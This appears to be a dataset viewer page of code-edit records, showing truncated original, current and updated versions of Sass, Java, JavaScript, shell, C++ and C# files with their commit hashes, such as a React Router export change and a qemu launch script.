.error-message
white-space: pre
max-width: 700px
overflow-x: auto
<|file_sep|>current/app/assets/stylesheets/error-message.css.sass
.error-message
white-space: pre
max-width: 700px
overflow-x: auto
<|file_sep|>updated/app/assets/stylesheets/... | 3fd19119f03151fa11ca072f1ee09fc2e4523529 | app/assets/stylesheets/error-message.css.sass | app/assets/stylesheets/error-message.css.sass | Sass |
<|file_sep|>original/src/test/java/sc/iview/VolumeScriptTest.java
<|file_sep|>current/src/test/java/sc/iview/VolumeScriptTest.java
<|file_sep|>updated/src/test/java/sc/iview/VolumeScriptTest.java | package sc.iview;
import org.scijava.command.CommandService;
import org.scijava.script.ScriptService;
import java.io.BufferedWriter;
import java.io.File;
import java.io.FileWriter;
import java.util.HashMap;
public class VolumeScriptTest {
static String script = "# @SciView sv\n" +
"# @UIService ui\n\n" +
"impor... | <|file_sep|>original/src/test/java/sc/iview/VolumeScriptTest.java
<|file_sep|>current/src/test/java/sc/iview/VolumeScriptTest.java
<|file_sep|>updated/src/test/java/sc/iview/VolumeScriptTest.java
package sc.iview;
import org.scijava.command.CommandService;
import org.scijava.script.ScriptService;
import java.io.Buf... | bf8eee3e40216822d5df8e52ddc953034f598862 | src/test/java/sc/iview/VolumeScriptTest.java | src/test/java/sc/iview/VolumeScriptTest.java | Java |
<|file_sep|>original/modules/index.js
export {
withHistory,
Route,
Switch,
Router
} from './Core'
// Accessories
export Link from './Link'
export Redirect from './Redirect'
export Prompt from './Prompt'
// High-level wrappers
export BrowserRouter from './BrowserRouter'
export HashRouter from './HashRouter'
ex... | export {
matchPath,
withHistory,
Route,
Switch,
Router
} from './Core'
// Accessories
export Link from './Link'
export Redirect from './Redirect'
export Prompt from './Prompt'
// High-level wrappers
export BrowserRouter from './BrowserRouter'
export HashRouter from './HashRouter'
export MemoryRouter from '.... | <|file_sep|>original/modules/index.js
export {
withHistory,
Route,
Switch,
Router
} from './Core'
// Accessories
export Link from './Link'
export Redirect from './Redirect'
export Prompt from './Prompt'
// High-level wrappers
export BrowserRouter from './BrowserRouter'
export HashRouter from './HashRouter'
ex... | 67c61692571c9ab236fb44df3b5916a5b77a0b02 | modules/index.js | modules/index.js | JavaScript |
<|file_sep|>original/tools/qemu-system-arm.gdb-freeze.runner.sh
<|file_sep|>current/tools/qemu-system-arm.gdb-freeze.runner.sh
<|file_sep|>updated/tools/qemu-system-arm.gdb-freeze.runner.sh | #!/usr/bin/env bash
# $1 is the 'machine' to emulate. 'qemu-system-arm -M ?' for a list of machines
# $2 is the bin file to execute
qemu-system-arm -s -S -cpu arm1176 -M $1 -m 128M -nographic -no-reboot -kernel $2 | <|file_sep|>original/tools/qemu-system-arm.gdb-freeze.runner.sh
<|file_sep|>current/tools/qemu-system-arm.gdb-freeze.runner.sh
<|file_sep|>updated/tools/qemu-system-arm.gdb-freeze.runner.sh
#!/usr/bin/env bash
# $1 is the 'machine' to emulate. 'qemu-system-arm -M ?' for a list of machines
# $2 is the bin file to exec... | 0d2841e30addda3b899bbfedeab5b7aabedeb19a | tools/qemu-system-arm.gdb-freeze.runner.sh | tools/qemu-system-arm.gdb-freeze.runner.sh | Shell |
<|file_sep|>gui/mainwindow.h.diff
original:
#ifndef MAINWINDOW_H
#define MAINWINDOW_H
updated:
#pragma once
<|file_sep|>original/gui/mainwindow.h
#ifndef MAINWINDOW_H
#define MAINWINDOW_H
#include <QMainWindow>
namespace Ui {
class MainWindow;
}
class MainWindow : public QMainWindow
{
Q_OBJECT
public:
expli... | #pragma once
#include <QMainWindow>
namespace Ui {
class MainWindow;
}
class MainWindow : public QMainWindow
{
Q_OBJECT
public:
explicit MainWindow(QWidget *parent = 0);
~MainWindow();
private:
Ui::MainWindow *ui;
};
| <|file_sep|>gui/mainwindow.h.diff
original:
#ifndef MAINWINDOW_H
#define MAINWINDOW_H
updated:
#pragma once
<|file_sep|>original/gui/mainwindow.h
#ifndef MAINWINDOW_H
#define MAINWINDOW_H
#include <QMainWindow>
namespace Ui {
class MainWindow;
}
class MainWindow : public QMainWindow
{
Q_OBJECT
public:
expli... | a21685eab417189d887db6d5a83bfff83661c1eb | gui/mainwindow.h | gui/mainwindow.h | C |
<|file_sep|>original/Framework/Source/Tralus.Framework.Migration/Migrations/Configuration.cs
// );
//
//var administratorRole = new Role(true)
//{
// Name = "Administrators",
// IsAdministrative = true,
// CanEditModel = t... | // );
//
//var administratorRole = new Role(true)
//{
// Name = "Administrators",
// IsAdministrative = true,
// CanEditModel = true,
//};
context.Set<Role>().AddOrUpdate(new Role(true)
... | <|file_sep|>original/Framework/Source/Tralus.Framework.Migration/Migrations/Configuration.cs
// );
//
//var administratorRole = new Role(true)
//{
// Name = "Administrators",
// IsAdministrative = true,
// CanEditModel = t... | 5e402220be25d892c40aad57d3009bbd4163c317 | Framework/Source/Tralus.Framework.Migration/Migrations/Configuration.cs | Framework/Source/Tralus.Framework.Migration/Migrations/Configuration.cs | C# |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.